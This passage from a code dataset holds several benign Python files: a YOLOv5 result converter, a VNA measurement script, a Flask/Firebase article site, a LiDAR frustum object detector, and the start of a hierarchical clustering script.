rv.data\n","repo_name":"AltCtrlSupr/acs-nginx-api","sub_path":"tests/test_virtualalias.py","file_name":"test_virtualalias.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72459212673","text":"\"\"\"\n 实现效果:将YOLOv5中detect出来的结果进行转换\n 原格式:一张图片对应一个同名txt,txt中存储检测结果\n 例如:3610.jpg --> labels/3610.txt(3610.txt中共有316行),3611.jpg --> labels/3611.txt(3611.txt中共有30行)\n 3610.txt : 0 0.480452 0.509121 0.0191138 0.029316 -----\n 0 0.884883 0.468404 0.0199826 0.0221498 |\n 0 0.306907 0.471661 0.016073 0.0273616 |——> 316行\n ... |\n 0 0.388575 0.421498 0.00825369 0.0169381 -----\n\n 3611.txt : 0 0.77725 0.36475 0.00483333 0.008 -----\n 0 0.830083 0.365375 0.00516667 0.00925 |\n 0 0.679583 0.398125 0.00516667 0.00875 |——> 30行\n ... |\n 0 0.524917 0.441375 0.00616667 0.01075 -----\n\n 转换后:只有一个detectResult.txt,一行存放一张图片的检测结果\n 例如: detectResult.txt : 3610 316\n 3611 30\n ...\n\"\"\"\n\nimport os\n\n# 字体颜色控制\nred_begin = '\\033[1;31;40m'\ngreen_begin = '\\033[1;32;40m'\nyellow_begin = '\\033[1;33;40m'\nblue_begin = '\\033[1;34;40m'\ncolor_end = '\\033[0m'\n\n\n# 获取指定文件夹下的所有文件名\ndef get_file_name(path):\n file_name = os.listdir(path)\n return file_name\n\n\n# 获取所有检测文件的名字\ndef get_files_name(path, file_suffixs):\n files = get_file_name(path)\n # 整理文件,删除后缀\n files = [file.split('.')[0] for file in files if file.split('.')[1] in file_suffixs]\n # 将图片按名字排好序\n files.sort()\n print(f'-- {blue_begin} the number of files : {color_end} {len(files)}')\n print(f'-- files : {files} ')\n return files\n\n\ndef get_labels(path, imgs_name):\n labels = {}\n for name in imgs_name:\n labels_path = f'{path}/{name}.txt'\n if os.path.exists(labels_path):\n with open(labels_path, 'r') as f:\n labels[name] = len(f.readlines())\n f.close()\n else:\n labels[name] = 0\n\n print(f'-- {blue_begin} labels : {color_end} {labels}')\n return labels\n\n\ndef save_file(path, content):\n with open(path, 'w') as f:\n f.write(content)\n print(f'-- 写入成功')\n f.close()\n\n\ndef save_labels(path, labels):\n content = \"\"\n for name in labels.keys():\n content = f'{content}{name} {labels[name]}\\n'\n save_file(path, content)\n\n\ndef detect_result(file_from_path, file_suffixs, label_from_path, label_to_path, result_save_file):\n # 获取所有检测文件的名字\n files_name = get_files_name(file_from_path, file_suffixs)\n # 读取检测结果\n labels = get_labels(label_from_path, files_name)\n # 保存检测结果\n save_labels(f'{label_to_path}/{result_save_file}', labels)\n return files_name, labels\n\n\ndef get_detect_result(file_from_path, file_suffixs, label_from_path, label_to_path, result_save_file):\n # 获取所有检测文件的名字\n files_name = get_files_name(file_from_path, file_suffixs)\n # 读取检测结果\n labels = get_labels(label_from_path, files_name)\n return files_name, labels\n\n# 入口函数\ndef main():\n # 路径设置\n result_save_file = 'detectResult.txt'\n img_from_path = '检测图片的路径'\n label_from_path = f'检测结果标签存放路径'\n label_to_path = f'最后结果文件存放处'\n suffixs = ['jpg', 'png', 'jpeg', 'gif', 'bmp'] # 待检测文件的后缀list\n detect_result(img_from_path, suffixs, label_from_path, label_to_path, result_save_file)\n\n\n# 测试性能专用函数\ndef test():\n print('Test time.\\n')\n labels_name = ['111.jpg', '22.png', '36.jpg']\n suffix = ['png', 'jpg', 'jpeg', 'bmp']\n print([name.split('.')[0] for name in labels_name if name.split('.')[1] in suffix])\n\n\nif __name__ == '__main__':\n main()\n # test()\n","repo_name":"cxmmaycxm/yolov5CommonTools","sub_path":"yoloDetectResult.py","file_name":"yoloDetectResult.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74374519235","text":"import pyvisa\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import interp1d\nimport time\n\ndef get_s21(fstart, fstop, subscanbw, num_points, kidpower, ifbw):\n bfout, bfin, rfout = power_calibration()\n\n totscanbw = fstop - fstart\n num_subscans = int(np.ceil(totscanbw / subscanbw))\n realfstart = fstart\n realfstop = fstart + num_subscans * subscanbw\n f0start = realfstart + subscanbw / 2\n freqs = np.linspace(realfstart, realfstop, num_points*num_subscans)\n scans = []\n # Connect with VI's\n vna = connect2vi(\"GPIB0::16::INSTR\", timeout=3000000)\n weinschell = connect2vi(\"GPIB0::10::INSTR\", timeout=300000)\n # Initialize VNA\n init_vna(vna)\n for i in range(num_subscans):\n f0 = f0start + i*subscanbw\n if i == 0:\n KID_cryoOUt = bfout(f0)\n GainRFbox = rfout(f0)\n PcryoOUt = kidpower + KID_cryoOUt + GainRFbox\n PVNAin = PcryoOUt - 2\n if PVNAin > 62:\n att = 62\n elif PVNAin < 2:\n att = 2\n else:\n att = PVNAin\n att = np.round(att / 2) * 2\n set_weinschell(weinschell, att)\n KID_cryoIn = bfin(f0)\n vna_power = kidpower - KID_cryoIn\n subscan = vna_scan(vna, f0, subscanbw, num_points, vna_power, ifbw, i)\n scans.append(subscan)\n s21 = np.array(scans).flatten()\n print('S21 completed')\n vna.close()\n weinschell.close()\n return freqs, s21\n\n\ndef power_calibration():\n BFout = np.load('calibration files/BFout.npy')\n BFin = np.load('calibration files/BFin.npy')\n RFout = np.load('calibration files/RFout.npy')\n bfout = interp1d(BFout[:, 0], BFout[:, 1])\n bfin = interp1d(BFin[:, 0], BFin[:, 1])\n rfout = interp1d(RFout[:, 0], RFout[:, 1])\n return bfout, bfin, rfout\n\ndef connect2vi(VISA, timeout=300000):\n rm = pyvisa.ResourceManager() \n vi = rm.open_resource(VISA)\n vi.timeout = timeout\n try:\n vi.query('*IDN?')\n except:\n print('Could not connect to VI')\n return vi\n\ndef init_vna(vna):\n vna.write(f'SYST:PRES')\n vna.write(f'CONT:AUX:OUTP2:VOLT 0')\n vna.write(f'CONT:AUX:OUTP1:VOLT 5')\n \n vna.write('OUTP ON')\n # vna.write('MMEMORY:LOAD \"D:\\KIDS\\KIDs.csa\";')\n vna.query(f'*OPC?')\n vna.write('SENS1:SWE:TRIG:POIN OFF;')\n vna.write('TRIG:SCOP CURR;')\n vna.write('INIT1:CONT ON;')\n\ndef vna_scan(vna, f0, subscanbw, num_points, vna_power, ifbw, id):\n\n # Set sweep params\n session = 'Scan%d' % id\n vna.write(f'DISP:WIND:TRAC1:DEL;')\n vna.write(f'CALC1:PAR:DEF \"{session}\", S21;')\n vna.write(f'CALC1:PAR:SEL \"{session}\";')\n vna.write(f'DISP:WIND:TRAC1:FEED \"{session}\";') \n vna.write(f'DISP:WIND:TRAC1:Y:AUTO')\n vna.write(f'SENS1:FREQ:CENT {f0}GHz;')\n vna.write(f'SENS1:FREQ:SPAN {subscanbw}GHz;')\n vna.write(f'SOUR1:POW1:LEV {vna_power};')\n vna.write(f'SENS1:BWID {ifbw}Hz;')\n vna.write(f'SENS1:SWE:POIN {num_points};') \n vna.write(f'MMEM:STOR:TRAC:FORM:SNP DB;')\n vna.write('FORM:DATA ASCII;')\n vna.write(f'sens1:swe:trig:poin off;')\n vna.write(f'sens1:swe:time:auto on;') \n vna.write(f'TRIG:SOUR MAN;')\n vna.write(f'INIT:CONT OFF;')\n power = float(vna.query(f'SOUR1:POW1:LEV?'))\n print('VNA power = %.2f' % power)\n \n # Trigger a single sweep\n vna.write(f'TRIG:SCOP CURR;')\n vna.write(f'INIT:IMM;')\n if vna.query('*OPC?'):\n response = vna.query_ascii_values(f'CALC1:DATA? FDATA;')\n s21 = np.array(response)\n if vna.query(f'*OPC?'):\n print('Subscan %d complete' % (id))\n \n return s21\n\n\ndef set_weinschell(weinschell, attn):\n attn_chan2 = 2\n weinschell.write(f'CHAN1;ATTN {attn}')\n weinschell.write(f'CHAN2;ATTN {attn_chan2}')\n \n\ndef plot_s21(freqs, s21):\n fig, ax = plt.subplots()\n _ = ax.plot(freqs, s21, lw=0.2)\n ax.set_xlim([np.amin(freqs), np.amax(freqs)])\n ax.set_xlabel('F [GHz]')\n ax.set_ylabel('|$S_{21}$| [dB]')\n ax.set_title('S21 from VNA')\n ax.grid(which='Major')\n plt.show()\n\n\n\n# run\n# st = time.time()\n# freqs, s21 = get_s21(4, 6, 0.1, 3201, -110, 1000)\n# et = time.time()\n# elapsed_time = et - st\n# print('Elapsed time = %d seconds' % elapsed_time)\n# plot_s21(freqs, s21)\n","repo_name":"wilbertras/spatial-mapping","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44165325371","text":"# test\n\nfrom datetime import datetime\nfrom os.path import isfile\nfrom os.path import join\nfrom markdown import markdown\n\nfrom flask import *\nfrom flask_caching import Cache\nfrom flask_socketio import SocketIO, send\nfrom authlib.integrations.flask_client import OAuth\nimport json\nimport markdown\n\nfrom content import load_content\nfrom firebase.article import upload_article\nimport g_auth\n\nif not isfile('.env'):\n print(\n 'WARN: Missing .env file, please add a .env file in your root directory.'\n )\n\ncontent = load_content(\"content.yml\")\nearlyaccess = False\nARTICLE_MIN = 2000\nARTICLE_MAX = 30000\n\n# firebase imports (should be done after dotenv validation)\nfrom firebase import user as fbuser\nfrom firebase import tools as fbtools\nfrom firebase import paginate\nfrom firebase import search as fbsearch\nfrom firebase import article as fbarticle\n\napp = Flask(__name__, template_folder='src')\napp.config['TEMPLATES_AUTO_RELOAD'] = True\napp.config['FLASK_ENV'] = 'development'\napp.config['DEBUG'] = True\napp.config['CACHE_TYPE'] = 'SimpleCache'\napp.config['CACHE_DEFAULT_TIMEOUT'] = 1800\napp.secret_key = g_auth.secret_key\n\nsio = SocketIO(app, debug=True, threaded=True)\noauth = OAuth(app)\n\ngoogle = oauth.register(**g_auth.config)\n\nCATS = {}\n\nwith open('cats.json') as f:\n CATS = json.load(f)\n\n\ndef md_html(md_str):\n return markdown(md_str)\n\n\n@app.context_processor\ndef utility_processor():\n def is_signed_in():\n return fbuser.is_signed_in()\n\n def current_pfp():\n try:\n return fbtools.get_doc(u'users', fbuser.current_uid())['pfp']\n except Exception:\n return ''\n\n def user_elevations():\n try:\n return fbtools.get_doc(u'users', fbuser.current_uid())['elevation']\n except Exception:\n return []\n\n def authorized(level, uid=fbuser.current_uid()):\n try:\n return fbtools.isauthorized(level, uid)\n except Exception:\n return False\n\n def c_user():\n try:\n return fbtools.get_doc(u'users', fbuser.current_uid())\n except Exception:\n return None\n\n def unix_time(time):\n return datetime.fromtimestamp(time).strftime('%d/%m/%Y')\n\n def cats():\n return CATS\n \n def md(m):\n return markdown.markdown(m)\n\n return dict(is_signed_in=is_signed_in,\n current_pfp=current_pfp,\n user_elevations=user_elevations,\n authorized=authorized,\n c_user=c_user,\n unix_time=unix_time,\n cats=cats,\n md=md)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n try:\n subpage = request.args.get('goto') if earlyaccess is not True else None\n init_pagi = paginate.paginate('articles', 'timestamp', l=5, o='DESC')\n for i in init_pagi['data'][1:]:\n i['body'] = i['body'].strip().replace(\"\\n\",\n \"\")[:150].rsplit(' ', 1)[0]\n return render_template('./screens/index.html',\n subpage=subpage,\n h=init_pagi)\n except Exception as e:\n return f\"Something went wrong: {e}\"\n\n\n@app.route('/greet')\ndef greet():\n return dict(session)['profile']\n\n\n@app.route('/login/google')\ndef google_auth():\n google = oauth.create_client('google')\n redirect_uri = url_for('authorize', _external=True)\n return google.authorize_redirect(redirect_uri)\n\n\n@app.route('/authorize')\ndef authorize():\n google = oauth.create_client('google')\n token = google.authorize_access_token()\n resp = google.get('userinfo')\n user_info = resp.json()\n user = oauth.google.userinfo()\n session['profile'] = user_info\n session.permanent = True\n fbuser.google_user_doc(user_info)\n return redirect('/')\n\n\n@app.route('/profile/my/logout')\ndef logout():\n for key in list(session.keys()):\n session.pop(key)\n return redirect('/')\n\n\n@app.route('/profile/my/delete')\ndef delete_user():\n try:\n fbuser.delete_user()\n return redirect('/profile/my/logout')\n except Exception:\n return \"Couldn't delete your account\"\n\n\n@app.route('/profile/me', methods=['GET', 'POST'])\ndef current_user_profile_redir():\n try:\n cuid = fbuser.current_uid()\n if cuid != None:\n return redirect(f'/profile/{cuid}')\n return redirect('/login')\n except Exception:\n return redirect('/login')\n\n\n@app.route('/profile')\ndef profile_redir():\n return redirect(\"/profile/me\")\n\n\n@app.route('/user')\ndef user_redir():\n return redirect(\"/profile/me\")\n\n\n@app.route('/account')\ndef account_redir():\n return redirect(\"/profile/me\")\n\n\n@app.route('/me')\ndef me_redir():\n return redirect(\"/profile/me\")\n\n\n@app.route('/profile/my')\ndef profile_my():\n return redirect(\"/profile/me\")\n\n\n@app.route('/my')\ndef my_redir():\n return redirect(\"/profile/me\")\n\n\n@app.route('/about')\ndef about():\n return render_template('./screens/about.html',\n about_text=content[\"about_text\"])\n\n\n@app.route('/contribute')\ndef contribute():\n return render_template('./screens/contr.html')\n\n\n@app.route('/verify')\n# return redirect if uid param is not istype(int)\ndef verify():\n uid = request.args.get('uid')\n if fbuser.user_exists(uid):\n return render_template('./screens/verify.html',\n verification_text=content[\"verification_text\"])\n return redirect(\"/\")\n\n\n@app.route('/favicon.png')\ndef favicon():\n return send_from_directory(join(app.root_path, 'static'),\n 'favicon.png',\n mimetype='image/vnd.microsoft.icon')\n\n\n@app.route('/write', methods=['POST', 'GET'])\ndef write():\n if request.method == \"POST\":\n article_title = request.form.get('title')\n article_body = request.form.get('body')\n article_cover = request.form.get('cover')\n if (len(article_title) <= 60 and len(article_title) >= 5) or (\n len(article_body) <= ARTICLE_MIN\n and len(article_body) >= ARTICLE_MAX):\n fbarticle.writer_upload(article_title, article_body, article_cover)\n else:\n return 'illegal'\n if fbtools.isauthorized('W', fbuser.current_uid()):\n return render_template('./screens/elevated/write.html')\n return forbidden(Exception(\"User not authorized\"))\n\n\n@app.route('/legal/terms-and-conditions')\ndef terms():\n with open('terms.md', 'r') as f:\n tac = md_html(f.read())\n return render_template('./screens/legal/terms-and-conditions.html',\n updated=\"2021-09-06\",\n tac=tac)\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('./err/404.html',\n message=content[\"404_message\"]), 404\n\n\n@app.errorhandler(403)\ndef forbidden(e):\n return render_template('./err/403.html',\n message=content[\"403_message\"]), 403\n\n\n@app.route('/register')\ndef register():\n return redirect(\n \"/?goto=register\") if earlyaccess is not True else redirect('/')\n\n\n@app.route('/login')\ndef login():\n return redirect(\"/?goto=login\") if earlyaccess is not True else redirect(\n '/')\n\n\n@app.route('/profile/my/edit', methods=['GET', 'POST'])\ndef profile_edit():\n if earlyaccess is True: return redirect('/')\n try:\n if (fbuser.current_uid() is None or fbtools.get_doc(\n u'users', fbuser.current_uid())['elevation'] == []):\n return redirect('/login')\n if request.method == \"POST\":\n fbtools.update_fields(\n 'users',\n fbuser.current_uid(),\n {\n # TODO: #51 add pfp post method here too\n u'email_public':\n request.form.get(\"profile-edit-email-public\") == 'on',\n u'bio':\n request.form.get(\"profile-edit-bio\").strip(),\n u'phone':\n request.form.get(\"profile-edit-phone\").strip(),\n u'location':\n request.form.get(\"profile-edit-location\").strip(),\n u'name':\n request.form.get(\"profile-edit-name\").strip(),\n },\n )\n return render_template('./screens/profile_edit.html')\n except Exception:\n return redirect('/login')\n\n\n@app.route('/profile/')\ndef user_profile(uid):\n try:\n user_data = fbtools.get_doc(u'users', uid)\n if user_data['elevation'] == []:\n raise Exception()\n return render_template('./screens/profile.html', user_data=user_data)\n except Exception:\n return render_template('./screens/profile_not_found.html')\n\n\n@app.route('/article/')\ndef article_page(auid):\n # try fetching data from the uid using fbtools and redirect to / if Exception\n \"\"\" try:\n article = fbtools.get_doc(u'articles', uid)\n if article[\"is_approved\"] is True:\n # Article approved and published, return the content\n return render_template('./screens/article.html', article=article)\n else:\n raise Exception(\"Non-approved article\")\n except Exception:\n # Render an article not found message\n return render_template('./screens/article.html', article=None) \"\"\"\n try:\n article = fbtools.get_doc(u'articles', auid)\n article['writer'] = article['writer'].get().to_dict()\n return render_template('./screens/article.html', article=article)\n except Exception:\n return render_template('./screens/article_not_found.html')\n\n\n@app.route('/profile/my/rmpfp')\ndef rmpfp():\n try:\n fbtools.update_fields(u'users', fbuser.current_uid(), {u'pfp': ''})\n except Exception:\n pass\n return (\"current user pfp reset\")\n\n\n@app.route('/profile/my/delete-acc')\ndef rmacc():\n # TODO: #52 this should open up a verification page. using the button, get a post method and when method='post', call remove account function.\n return (\"alla\")\n\n\n@app.route('/api/pagi///q')\ndef api_pagi(coll, sort):\n return paginate.paginate(coll, sort, **dict(request.args))\n\n\n@app.route('/search/')\ndef search(kw):\n return fbsearch.search_article(kw)\n\n\n@sio.on('pagiRequest')\ndef pagi_request(data):\n send(paginate.paginate('articles', 'timestamp', l=10, o='desc', i=data))\n\n\ndef start():\n # fbuser.register(\"dmeoeom@gdgd.com\", \"passssword\", \"name\")\n # fbuser.login(\"dmeoeom@gdgd.com\", \"passssword\")\n # app.run(debug=True, threaded=True)\n sio.run(app)\n\n\ndef uuid():\n from firebase.setup import auth\n try:\n return auth.current_user['localId']\n except Exception:\n return None\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"shape-ist/TheIstanbulChronicle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"30225540926","text":"import os\nimport argparse\nimport numpy as np\nimport math\nimport sys\n\n# sys.path.append(os.path.join(os.getcwd(), 'models/pre_trained'))\n# print(sys.path)\n\nfrom sklearn import mixture\nfrom scipy.signal import savgol_filter\nfrom datetime import datetime\n# from models.pre_trained.yolo_v3_interface import YOLOv3Interface\nfrom detectors.mask_rcnn_interface import MaskRCNNInterface\nfrom data.data_loader import DatasetLoader\nfrom utils.data_operations import transform, frustum_project\n\nnp.set_printoptions(precision=4, suppress=True)\n\n# class mapping\nlabels_coco_to_kitti = {\n 'person': 'Pedestrian',\n 'bicycle': 'Cyclist',\n 'car': 'Car',\n 'truck': 'Truck',\n 'bus': 'Van'\n}\n\n\nclass Detector:\n def __init__(self, model, data_loader, sample_list):\n self.model = model\n self.data_loader = data_loader\n self.sample_list = sample_list\n\n def run_detection(self, path_output):\n for sample_name in self.sample_list:\n print('Generating result (.txt) for %s sample %s ...' % (self.data_loader.data_type, sample_name))\n\n # 1. read raw data\n img, points_3d_lidar, cal_info, gt_info = self.data_loader.read_raw_data(sample_num=sample_name)\n\n # 2. call yolo on `img` to get 2d boxes\n masks_img, boxes_img, labels_img, scores_img = self.model.detect(img)\n\n # 3 .transform 3d points into 2d points\n points_2d_img, points_3d_cam0 = transform(points_3d_lidar, cal_info)\n\n # 4. ground removal (skip)\n\n # 5. frustum projection\n clusters_cam0, _, _ = frustum_project(\n points_2d_img=points_2d_img,\n points_3d_cam0=points_3d_cam0,\n boxes=boxes_img,\n masks=masks_img\n )\n\n # 6. calculate bird view positions of each objects\n positions_bev = self.cal_bev_pos(clusters_cam0)\n\n # 7. calculate 3d positions of each objects (skip)\n\n # 8. calculate score and save txt file\n self.save_as_txts(\n path_output=path_output,\n name_sample=sample_name,\n classes=self.model.classes,\n positions_bev=positions_bev,\n boxes=boxes_img,\n labels=labels_img,\n scores=scores_img\n )\n\n @staticmethod\n def cal_bev_pos(clusters, method='histogram'):\n clf = mixture.GaussianMixture(n_components=2, covariance_type='full')\n\n positions = []\n # for i in range(len(boxes_img)):\n for cluster in clusters:\n if len(cluster) == 0:\n positions.append(None)\n else:\n if method == 'average':\n pos = [cluster[:, 0].mean(), cluster[:, 1].mean(), cluster[:, 2].mean()]\n elif method == 'mix_gaussian':\n if len(cluster[:, [0, 2]]) < 3:\n pos = [cluster[:, 0].mean(), cluster[:, 1].mean(), cluster[:, 2].mean()]\n else:\n clf.fit(cluster[:, [0, 2]])\n k = np.argmax(np.argsort(clf.covariances_[:, 0, 0]) + np.argsort(clf.covariances_[:, 1, 1]))\n pos = [clf.means_[k, 0], None, clf.means_[k, 1]]\n elif method == 'histogram':\n pos = []\n for j in range(3):\n hist = np.histogram(cluster[:, j])\n k = np.argmax(hist[0])\n pos.append((hist[1][k] + hist[1][k + 1]) / 2)\n else:\n raise Exception('Invalid definition of method.')\n positions.append(tuple(pos))\n\n return positions\n\n @staticmethod\n def remove_ground(points3D):\n pi = math.pi\n # points3D=points3D[points3D[:,2]>0,:]\n points3D = np.insert(points3D, 5, values=0, axis=1)\n tanpoints3D = np.true_divide(points3D[:, 2], points3D[:, 0])\n\n points3D = np.insert(points3D, 6, tanpoints3D, axis=1)\n distance = np.multiply(points3D[:, 0], points3D[:, 0]) + np.multiply(points3D[:, 2], points3D[:, 2])\n distance = distance ** 0.5\n points3D = np.insert(points3D, 7, distance, axis=1) # distance\n points3D = np.insert(points3D, 8, 0, axis=1) # angel for z and distance\n points3D = np.insert(points3D, 9, 0, axis=1) # ray number\n raysize = 5000\n rayspace = []\n for i in range(raysize):\n size = len(rayspace)\n current = points3D[points3D[:, 6] <= math.tan(pi / raysize * (i + 1)), :]\n current = current[current[:, 6] >= math.tan(pi / raysize * (i)), :]\n if len(current) != 0:\n current = current[current[:, 7].argsort()]\n current[:, 9] = size + 1\n else:\n continue\n # rayspace.append(current)\n rayspace.append(current)\n\n size1 = len(rayspace)\n newray = np.array(rayspace[0][:][:])\n for i in range(1, size1):\n newray = np.append(newray, np.array(rayspace[i][:][:]), axis=0)\n newpoint = np.zeros((1, 10))\n for i in range(size1):\n size = len(rayspace[i])\n current1 = newray[newray[:, 9] == i + 1, :]\n current1[0, 5] = 0\n size = len(current1)\n for j in range(1, size):\n current1[j, 8] = abs(\n math.atan((current1[j, 1] - current1[j - 1, 1]) / (current1[j, 7] - current1[j - 1, 7]))) / pi * 180\n if j == size - 1 and j > 5:\n current1[:, 8] = savgol_filter(current1[:, 8], 7, 5)\n for j in range(1, size):\n if current1[j, 8] > 9:\n current1[j, 5] = 1\n newpoint = np.append(newpoint, current1, axis=0)\n # newpoint.append(current)\n # size1=len(rayspace)\n # newray=np.array(rayspace[0][:][:])\n # for i in range(1,size1):\n # newray=np.append(newray,np.array(rayspace[i][:][:]),axis=0)\n #\n # newpoint1 = []\n # for i in range(size1):\n # newpoint1.append(rayspace[i][:])\n # newpoint1=np.asarray(newpoint1)\n points_3D_ground_label = newpoint[0:-1, :]\n\n # plot result\n removeground = points_3D_ground_label\n # plot removed ground\n # fig = plt.figure(figsize=(10, 10))\n # ax = fig.add_subplot(111)\n # ax.plot(removeground[removeground[:,5]==0,0].T, removeground[removeground[:,5]==0,2].T,'.', alpha=0.2)\n # ax.set_xlim(-50, 50)\n # ax.set_ylim(0, 100)\n # ax.set_xlabel('x axis')\n # ax.set_ylabel('z axis')\n # ax.set_title('BEV of ground')\n # fig.savefig(PATH_OUT_IMG + '/%s_bevground.png' % name_sample)\n # plt.close(fig)\n # ax.plot(removeground[removeground[:,5]==1,0].T, removeground[removeground[:,5]==1,2].T, '.', alpha=0.2)\n # ax.set_xlim(-50, 50)\n # ax.set_ylim(0, 100)\n # ax.set_xlabel('x axis')\n # ax.set_ylabel('z axis')\n # ax.set_title('BEV of groundremove')\n # fig.savefig(PATH_OUT_IMG + '/%s_bevgroundremove.png' % name_sample)\n # plt.close(fig)\n\n return points_3D_ground_label\n\n @staticmethod\n def save_as_txts(path_output, name_sample, classes, positions_bev, boxes, labels, scores):\n # kitti result\n os.makedirs(path_output, exist_ok=True)\n with open('%s/%s.txt' % (path_output, name_sample), 'w') as f:\n f.truncate()\n for i in range(len(labels)):\n if positions_bev[i] is None:\n pass\n else:\n # Kitti type:\n # 'Car', 'Van', 'Truck' 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram', 'Misc' or 'DontCare'\n if classes[labels[i]] in labels_coco_to_kitti.keys():\n # 1 type Describes the type of object: 'Car', 'Van', 'Truck',\n # 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram',\n # 'Misc' or 'DontCare'\n f.write(labels_coco_to_kitti[classes[labels[i]]] + ' ')\n # 1 truncated Float from 0 (non-truncated) to 1 (truncated), where\n # truncated refers to the object leaving image boundaries\n f.write(str(0.00) + ' ')\n # 1 occluded Integer (0,1,2,3) indicating occlusion state:\n # 0 = fully visible, 1 = partly occluded\n # 2 = largely occluded, 3 = unknown\n f.write(str(0) + ' ')\n # 1 alpha Observation angle of object, ranging [-pi..pi]\n # todo: check what is observation angle\n f.write(str(0.00) + ' ')\n # 4 bbox 2D bounding box of object in the image (0-based index):\n # contains left, top, right, bottom pixel coordinates\n f.write('%.2f ' % boxes[i][0])\n f.write('%.2f ' % boxes[i][1])\n f.write('%.2f ' % boxes[i][2])\n f.write('%.2f ' % boxes[i][3])\n # 3 dimensions 3D object dimensions: height, width, length (in meters)\n f.write(str(-1.00) + ' ')\n f.write(str(0.70) + ' ')\n f.write(str(0.70) + ' ')\n # 3 location 3D object location x,y,z in camera coordinates (in meters)\n f.write('%.2f ' % positions_bev[i][0])\n f.write('%.2f ' % -1000.00)\n f.write('%.2f ' % positions_bev[i][2])\n # 1 rotation_y Rotation ry around Y-axis in camera coordinates [-pi..pi]\n f.write(str(0.00) + ' ')\n f.write('%.4f' % scores[i] + '\\n')\n # 1 score Only for results: Float, indicating confidence in\n # detection, needed for p/r curves, higher is better.\n else: # DontCare\n f.write('DontCare ')\n f.write('-1 ')\n f.write('-1 ')\n f.write('-10 ')\n f.write('%.2f ' % boxes[i][0])\n f.write('%.2f ' % boxes[i][1])\n f.write('%.2f ' % boxes[i][2])\n f.write('%.2f ' % boxes[i][3])\n f.write('-1 ')\n f.write('-1 ')\n f.write('-1 ')\n f.write('-1000 ')\n f.write('-1000 ')\n f.write('-1000 ')\n f.write('-10 ')\n # todo: verify how to report score of `DontCare`\n f.write('-1\\n')\n\n return None\n\n\ndef main():\n # parsing arguments\n argparser = argparse.ArgumentParser(description='Detecting Road-Users via Frustum-based Methods')\n argparser.add_argument('--data_type', default='kitti', help='select data type (e.g. kitti).')\n argparser.add_argument('--data_split', default='data/split/kitti', help='path to data split info.')\n argparser.add_argument('--data_path', required=True, help='path to the data dir. See README for detail.')\n argparser.add_argument('--detector', default='mask_rcnn', help='select 2D detector (mask_rcnn, yolo_v3)')\n args = argparser.parse_args()\n\n # model\n if args.detector == 'mask_rcnn':\n model = MaskRCNNInterface()\n else:\n raise NotImplementedError('Undefined detector.')\n\n # data loader\n data_loader = DatasetLoader(data_type=args.data_type, data_path=args.data_path)\n\n # detecter\n with open(os.path.join(args.data_split, 'eval.txt'), 'r') as f:\n data_list = f.read().split('\\n')\n detector = Detector(model=model, data_loader=data_loader, sample_list=data_list)\n\n # run detection\n cur_time = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n path_result = os.path.join('results', '%s_%s_%s' % (cur_time, args.detector, args.data_type), 'txts')\n detector.run_detection(path_output=path_result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dongfang-steven-yang/faraway-frustum","sub_path":"legacy/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":12536,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"61"} +{"seq_id":"5059184182","text":"# -*- encoding: utf-8 -*-\r\n\r\nimport sys\r\nimport math\r\nimport csv\r\n\r\nclass Hierarchical:#凝聚型层次聚类的类\r\n def __init__(self, center, left = None, right = None, flag = None, distance = 0.0):\r\n self.center = center#聚类中心\r\n self.left = left#合并数据的编号之一\r\n self.right = right#合并数据的编号之二\r\n self.flag = flag#标签,记录是否被处理过\r\n self.distance = distance\r\n\r\ndef traverse(node):#合并类\r\n if node.left == None and node.right == None:#没有合并过的类,即初始数据,递归出口\r\n return [node.center]\r\n else:\r\n return traverse(node.left) + traverse(node.right)#合并过的数据聚在一类\r\n\r\ndef distance(v1, v2):\r\n if len(v1) != len(v2):\r\n print(sys.stderr, \"invalid v1 and v2 !\")\r\n sys.exit(1)\r\n distance = 0\r\n for i in range(len(v1)):\r\n distance += (v1[i] - v2[i]) ** 2\r\n return math.sqrt(distance)#欧式距离\r\n\r\ndef hcluster(data, n):#聚类过程\r\n if not data:\r\n print(sys.stderr, \"invalid data\")\r\n sys.exit(1)\r\n clusters = [Hierarchical(data[i], flag = i) for i in range(len(data))]#初始化,每条数据都是一个类\r\n centers = [data[i] for i in range(len(data))]#聚类中心初始化为每条数据,之后的操作与聚类操作保持同步\r\n distances = {}#存储距离\r\n min_id1 = None#两个最接近的数据编号之1\r\n min_id2 = None#两个最接近的数据编号之2\r\n currentCluster = -100#作为flag的值,记录当前形成的聚类\r\n while(len(clusters) > n):#聚类结束条件:聚成小于n个类\r\n minDist = float('inf')#最小距离初始化,初始值设置为无穷大\r\n for i in range(len(clusters) - 1):\r\n for j in range(i + 1, len(clusters)):\r\n if distances.get((clusters[i].flag, clusters[j].flag)) is None:#如果之前没有计算过两条数据的距离\r\n distances[(clusters[i].flag, clusters[j].flag)] = distance(clusters[i].center, clusters[j].center)\r\n if distances[(clusters[i].flag, clusters[j].flag)] <= minDist:#距离小于或等于之前的最小距离,则更新两条数据的类的编号及距离\r\n min_id1 = i\r\n min_id2 = j\r\n minDist = distances[(clusters[i].flag, clusters[j].flag)]\r\n if min_id1 != None and min_id2 != None and minDist != float('inf'):#如果距离更新了则更新聚类中��\r\n newCenter = [(clusters[min_id1].center[i] + clusters[min_id2].center[i])/2 for i in range(len(clusters[min_id2].center))] \r\n newFlag = currentCluster\r\n currentCluster -= 1#改变下一个flag的值\r\n newCluster = 